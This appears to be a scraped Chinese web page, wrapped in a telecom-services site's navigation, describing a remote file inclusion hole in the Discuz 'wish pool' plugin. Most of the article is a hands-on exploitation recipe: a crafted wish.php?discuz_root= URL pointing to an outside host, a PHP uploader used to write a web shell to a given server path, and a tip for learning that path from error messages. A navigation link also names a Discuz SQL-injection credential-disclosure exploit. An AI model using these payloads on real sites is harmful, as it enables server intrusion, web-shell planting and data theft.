• 企业400电话
  • 微网小程序
  • AI电话机器人
  • 电商代运营
  • 全 部 栏 目

    企业400电话 网络优化推广 AI电话机器人 呼叫中心 网站建设 商标✡知产 微网小程序 电商运营 彩铃•短信 增值拓展业务
    discuz许愿池插件远程包含漏洞
    许愿池插件的wish.php文件出的问题:
    require $discuz_root.'./include/discuzcode.func.php';

    手工利用方法:
    远程包含漏洞,变量discuz_root过滤不严,利用方法:
    http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt?
    不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。
    这里xxxx.txt用CN.Tink的那个小马写个shell进去:
    ?copy($_FILES[MyFile][tmp_name],"C:\Inetpub\vhosts\baidu.com\bbs\guizai.php");?>
    form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">
    input NAME="MyFile" TYPE="file">
    input VALUE=" 提交 " TYPE="submit">
    /form>
    网站物理路径可以通过提交http://url/wish.php?discuz_root=http://www.huaidan.org/xxxx.txt ,看错误提示信息,然后修改xxxx.txt中的路径即可。 guizai.php就是你上传的shell的名字。 
    上一篇:Discuz! 4.x SQL injection / admin credentials disclosure exploit
    下一篇:防止电脑被他人控制
  • 相关文章
  • 

    © 2016-2020 巨人网络通讯 版权所有

    《增值电信业务经营许可证》 苏ICP备15040257号-8

    discuz许愿池插件远程包含漏洞 discuz,许愿,池,插件,远程,